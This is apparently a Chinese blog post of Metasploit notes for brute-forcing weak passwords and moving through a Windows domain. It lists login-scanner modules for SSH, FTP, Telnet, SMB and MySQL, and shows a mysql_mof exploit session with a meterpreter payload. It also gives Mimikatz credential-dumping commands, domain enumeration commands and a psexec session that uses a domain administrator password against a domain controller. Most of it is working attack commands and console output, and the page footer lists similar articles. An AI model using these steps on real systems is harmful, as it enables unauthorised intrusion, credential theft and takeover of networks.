msf各种弱口令爆破

最新推荐文章于 2022-09-01 15:46:11 发布
最新推荐文章于 2022-09-01 15:46:11 发布
阅读量1.4k 收藏 8
点赞数
分类专栏: # kali 文章标签: 安全 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/122791953
版权

msf各种弱口令爆破

Msf:

记录下msf各个爆破弱口令的模块

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机

 

metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

使用扫描模块

use scanner/portscan/tcp

爆破ssh

Msf>use auxiliary/scanner/ssh/ssh_login

爆破ftp

Msf>use auxiliary/scanner/ftp/ftp_login

爆破telnet

Msf>use auxiliary/scanner/telnet/telnet_login

爆破smb

auxiliary/scanner/smb/smb_login

爆破Mysql

use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt

使用mof模块进行权限获取

use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit

Mimikatz导出hash

<p>meterpreter &gt; load mimikatz</p> 
<p>meterpreter &gt; kerberos</p>

一些域内的命令

查看域
net view /domain
查看当前域中的计算机
net view
查看CORP域中的计算机
net view /domain:CORP
Ping计算机名可以得到IP
ping Wangsong-PC
获取所有域的用户列表
net user /domain
获取域用户组信息
net group /domain
获取当前域管理员信息
net group "domain admins" /domain
查看域时间及域服务器的名字
net time /domain
net time /domain 就可以知道域的计算机名
WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控
net group "domain admins" /domain

反弹shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit
zxl2605
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssh弱口令暴力破解
weixin_45253622的博客
03-28 2396
ssh弱口令暴力破解 ssh (安全外壳协议) SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、L
msf+mysql+弱口令爆破_msf各种弱口令爆破 - osc_zfz9ur01的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_28938701的博客
01-19 183
Msf:写的很乱 记录下msf各个爆破弱口令的模块run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24使用arp_scanner模块 检测在线主机metasploit 增加路由route add 10.10.1.3 255.255.255.0 1使用扫描模块use scanner/portscan/tcp爆破sshMsf>use ...
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
msf+mysql+弱口令爆破_内网渗透 | 手把手教你如何进行内网渗透
weixin_42347357的博客
01-27 1479
文章目录结构0x01 DMZ渗透首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。exp上面呢,就是利用exp将一句话写入当前目录的shellx.php中。get shell到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。0x02 跳板及内...
渗透测试工具篇之Metasploit(MSF)辅助模块的密码爆破
lzp_5257的博客
04-27 2372
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 使用MSF爆破模块进行进一步“信息收集” 一、常见的哈希加密 -----------------windows------------------------------------------ 系统:windows 例子:Admin:b474d48cdfc4974d86ef4d24904cdd91 长度:98个字符 加密算法:MD4(MD4(Unicode(pass)).Unicode(strtolower(pass)).Unicode.
MFS 服务扫描与爆破
weixin_30585437的博客
03-20 330
MSF 服务发现 常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http type:auxiliary // 搜索所有与HTTP相关的模块 发现HTT...
使用msf入侵多层级网络架构
06-01 2万+
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?首先,我们通过Web入侵获得Server1权限,并...
msf hydra 弱口令爆破SQL service(1433)
Jhd_02的博客
08-31 1251
弱口令爆破
telnet 弱口令爆破 菜刀提权
qq_56889067的博客
11-15 7678
第一题、使用2.txt密字典、爆破test用户的密码 使用nmap -sV 扫描目标靶机 IP 获取 靶机开启的端口及服务的版本信息。 发现开启的有22、23 端口及服务。这里我们使用 telnet服务进行爆破、使用msfconsole打开永恒之蓝。 使用search telnet_login 查看 telnet爆破模块。 使用use 调用 此模块,接着在模块内使用命令options查看需要配置的参数。 接下来配置参数RHOSTS目标IP,PASS_FILE 密码字典,USE...
Tomcat Manager口令爆破&利用Tomcat弱口令上传文件拿Shell&加固(详细到不能再详细了)
Aven.H的博客
08-20 3986
利用Tomcat弱口令上传文件获取系统权限 1. 漏洞详情: 当tomcat的manager管理界面存在弱口令时,可以登录后台上传war包,上传的war文件会自动解压至web目录下,可以访问上传木马文件并执行,获取系统权限,一般都是服务器的最高权限。 2. 环境搭建: (1) 服务器:windows_server2008 (2) 安装所需环境:jdk+apache+tomcat 配置jdk+Apache Tomcat 8.0.20,能正常访问tomcat默认界面。 这里要注意一个事
MSF的密码爆破模块
秋水的博客
10-10 2180
密码生成工具 genpAss 一句话介绍这个工具就是:中国特色的弱密码生成器 下载地址:https://github.com/RicterZ/genpAss 密码泄露查询: https://monitor.firefox.com/ https://haveibeenpwned.com/ 指令 -n #名字 -u #用户名 -q #QQ号 ...
弱口令(Weak Password)总结和爆破工具
热门推荐
博客地址 www.sec0nd.top
09-01 2万+
网站管理、运营人员由于安全意识不足,为了方便、避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等。攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。...
msf爆破
dongao8765的博客
08-25 242
SSH服务口令猜解: msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > show optionsmsf auxiliary(ssh_login) > set RHOSTS 192.168.1.1msf auxiliary(ssh_login) > set USER_FILE /...
Metasploit(msf)系列-爆破模块
chaojixiaojingang
09-27 1万+
       今天关于Kali的msf系列学习了爆破模块的使用,这个还是比较简单的,爆破的工具很多,我个人还是比较喜欢用Hydra和Burp这两个工具,不过还是介绍下msf系列的爆破模块的使用,用兴趣的可以学习。 原理:        利用主机开放的一些端口服务,进而对其用户名和密码进行弱口令爆破,例如21端口ftp服务、22端口ssh服务、23端口telnet服务、3306端口MySQL服...
Kali中SMB爆破工具————acccheck
Fly_鹏程万里
06-08 5337
acccheck简介acccheck是一个用于探测目标主机是否开放smb服务并且尝试连接目标默认IPC$、ADMIN$共享,并且通过字典文件尝试爆破smb服务的账号密码。这一个工具在Kali 2018中已经默认装了,下面是他的使用说明:这个工具的参数较少,而且英语解释也非常简单,这里我就不再多做解释了,下面来进行一个简单的演示操作:...
MSF MS12-020RDP漏洞攻击
weixin_30379973的博客
09-21 486
Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020) 漏洞描述:BUGTRAQ ID: 52354 CVE ID: CVE-2012-0152 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。 W...
入侵防御之口令破解
写代码的小阿帆的博客
05-03 1542
概述 日常生活中最常见的口令就是账号密码,但除此之外,手机指纹或虹膜识别等生物特征也是一种口令,短信验证码和早被淘汰的网银动态令牌也是属于动态口令的一种。 口令设立的目的是为了验证用户身份,如果我们有能够破解口令方法也就是有了获取权限或者伪装自己的方法。 破解思路 1.本地破解:能获取到主机的破解思路,比如对电脑开机密码或指定加密文件的破解。 解密方法:用字典爆破,彩虹表,空间换时间。 2.远程破解:对一些在线服务或账号进行破解。 破解方法: 1.技巧性:采用一些技术手段绕过验证。 2.爆破/穷举:攻击者根
常见协议爆破—ssh、rdp、smtp、pop3、imap等
qq_43058348的博客
04-27 3301
环境 kali- - - - 任意PC 常用爆破工具 msf、hydra、medusa、patator等 rdp hydra -l username -p password rdp://ip python patator.py rdp_login host=10.10.70.4 user='admin' password = '1' #上面这个主意要先export DISPLAY=:0.0 ssh hydra -l username -p password ssh://ip medusa -u u
CVE-2019-0708:RDP终极EXP爆破
m0_48520508的博客
12-15 1437
0x00 漏洞概述 CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。 2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。 0x01 影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 .
msf批量爆破ssh
最新发布
10-01
MSF(Metasploit Framework)是一个开源的渗透测试工具,它包含了各种模块和工具,用于发现漏洞、分析和执行攻击等操作。在Metasploit中,可以使用msfconsole命令进行交互式操作。 要进行批量爆破SSH,首先需要准备一个包含目标主机IP和相应的SSH账号密码的列表文件。接下来,可以使用MSF的auxiliary模块 "scanner/ssh/ssh_login" 来批量爆破SSH。 在msfconsole中,首先使用 "use auxiliary/scanner/ssh/ssh_login" 命令加载模块,然后使用 "set RHOSTS" 命令设置目标主机列表文件路径。接着,使用 "set USERPASS_FILE" 命令设置包含账号密码的文件路径。 设置完参数后,可以使用 "run" 命令开始批量爆破。Metasploit会逐个尝试每个用户名密码组合,并返回登录成功的结果。 需要注意的是,批量爆破SSH可能涉及到未经授权的访问,使用前请确保获得了授权,并遵守相关法规和道德规范。否则,可能会触犯法律并造成严重后果。 此外,为了提高爆破成功率,可以尝试使用字典文件,该文件包含了常用的用户名和密码组合,并使用 "set PASS_FILE" 和 "set USER_FILE" 命令设置相应的路径。 总之,通过Metasploit的MSF批量爆破SSH,可以帮助安全团队评估系统密码强度,并发现可能存在的漏洞。但在使用时需要谨慎,并遵守法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值